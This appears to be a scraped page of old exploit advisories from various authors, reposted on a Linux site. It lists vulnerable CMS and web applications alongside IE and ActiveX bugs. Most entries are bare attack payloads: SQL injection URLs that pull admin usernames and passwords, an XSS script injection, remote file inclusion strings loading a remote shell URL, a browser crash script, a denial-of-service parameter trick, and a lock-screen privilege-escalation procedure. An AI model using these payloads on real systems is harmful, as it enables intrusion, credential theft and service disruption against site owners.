New User, Welcome!     Login

Next Page >>

Discoverd By

IE address bar characters into a small feature

Vulnerability: IE address bar characters into a small feature 
My IE 8 on the address bar will automatically enter the url of the "\" (0x5c) transformed into "/" (0x2f)
Example: www.securitylab.ir \a Converted to www.securitylab.ir/a
Recently found that some phishing sites take advantage of this feature to bypass some security checks, it is hereby to be a mark
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

Joomla Component com_weblinks Sql Injection Vulnerability

# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 
################################################################# 
# Discoverd By: Pouya Daneshmand 
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

Pogodny CMS SQL vulnerabilities

Vulnerability:
# http://[HOST]/?modul=niusy&id=61[Sqli]

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com


Ariko-Security
vuln@ariko-security.com

Official Portal 2007 Multiple Vulnerabilities

http://site.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>
 
#################################################################  
Live Test: http://www.bkd-bandungkab.com
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################

SQL injection vulnerability in LiveChatNow

http://[site]/js/enter.php?cid=7546[SQLi]&skin=&survey=&survey_ec=&survey_

lm=&group=On-Duty+Techs

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com


Ariko-Security

Pixel Portal Sql Injection Vulnerability

# Risk: Medium
#################################################################
Vulnerability:
http://site.ir/products_list_fa.asp?id=-1001+UNION+ALL+SELECT+1,2,3,4,5,6,7,username,password,10,11,12,13+Form+admin
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

SQL injection vulnerability in Amelia CMS

Vulnerability:
# http://www.[site]/index.php?page=1322[SQLi]&lang=eng&cnt=services

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com

php-addressbook v2.0 SQL Injection Vulnerbility

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi 

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi 

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

artmedic_weblog Cross Site Scriptting Vulnerbility

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

MTCMS <=2.0 SQL Injection Vulnerbility

www.virangar.org
www.virangar.net

--------
Discoverd By :hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

Clever Copy <=3.0 Multiple Remote Vulnerabilities

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team(hadihadi)

---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra
& my lovely friend arash from empror team
& all virangar members & all  hackerz

boastMachine <=3.1 SQL Injection Vulnerbility

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

Dalai Forum Remote File Inclusion Exploit

#--------------------------------
#
#http://sitename.com/forum/forumreply.php?chemin=http://SHELLURL?
#
#================================================================================================
#Discoverd By :Darkdewil[system-errrror]
#
#Conatact : system-errrror[at]hotmail[dot]com
#
#Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen
#

Firesoft Remote File Inclusion

#--------------------------------
#
#http://sitename.com/path/includes/class/class_tpl.php?cache_file=http://SHELLURL?
#
#================================================================================================
#Discoverd By :Darkdewil[system-errrror]
#
#Conatact : system-errrror[at]hotmail[dot]com
#
#Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen
#

SPIP v1.7 Remote File Inclusion Bug

++
++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?
++
++==================================================================================
++
+++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++
++                                                                                ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++
++                                                                                ++ 
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++                                                                                ++

ePersonnel_RC_2004 Remote File Bug

*********************************************************************
******************* |The construction In the level |*****************
*********************************************************************
************************| Prepare by D@rkDewil |*********************
*********************************************************************
*************|Discoverd By :Darkdewil[system-errrror]|***************
************                                            ************* 
***********|Contact : system-errrror[at]hotmail[dot]com  |***********
*********                                                   *********
*********************************************************************
======>Thx To :Cazanova & fedaiturk & n3twork & codes & Sevecen<=====

Sigma Portal Denial of Service Vulnerability

http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

With setting of large values of width and height it's possible to create
large load at the server.
################################################################# 
# Discoverd By: Pouya Daneshmand
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################

Asan Portal (IdehPardaz) Multiple Vulnerabilities

# SQL Injection:
######################
http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75

#################################################################
# Discoverd By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###################################################################

Joomla Component com_xmap Sql Injection Vulnerability

# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
################################################################# 
# Discoverd By: Pouya Daneshmand 
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

QvodPlayer ColorFilter Codec ActiveX Remote Exec

# Vulnerability:
# <object id=TestObj classid="CLSID:{432F118C-DB79-4561-9799-CC95EA78208B}" style="width:100;height:350"></object>
###################################################################
# Tested on XpSP2 IE6/7
###################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
###################################################################

0day vulnerability Sogou input method to obtain system privileges

Vulnerability Process Description: 
When windows is loaded Sogou input method later (after sign-on system), 
lock the computer (cltr+alt+del) Switch to Sogou input method, enter the letters appear Sogou Pinyin input method tool bar, click search, will be called iexplorer.exe 
Then you can call directly in the IE address bar system32 directory and run the cmd, if the login account for the administrators group. Directly access the local system privileges. 
###################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: k4mr4n_st@yahoo.com
###################################################################

IdeaCMS v1.0 (fck) Remote Arbitrary File Upload

# Risk: High
#################################################################
# Vulnerability:
# http://site.com/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo(dot)com
###################################################################

Microsoft IE 6&7 Crash Exploit

Vulnerability:

IE.html
<script>document.createElement("html").outerHTML</script>
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################

RE: Microsoft IE 6&7 Crash Exploit

Vulnerability:

IE.html
<script>document.createElement("html").outerHTML</script>
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################

Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================================
#Discoverd By :  Fegla
#
#Conatact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ :  Sub-Code   ,ShikaA  , Wizard CC

Re: Microsoft IE 6&7 Crash Exploit

> Vulnerability:
>
> IE.html
> <script>document.createElement("html").outerHTML</script>
> #################################################################
> # Discoverd By: Pouya Daneshmand
> # Website: http://securitylab.ir
> # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
> ###################################################################

EEGshop v1.2

########################## Securitylab.ir ########################
# Application Info:
# Name: EEGshop
# Version: 1.2
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir , secu_lab_ir@yahoo.com
#################################################################
#===========================================================
# http://site.com/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1
Next Page>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!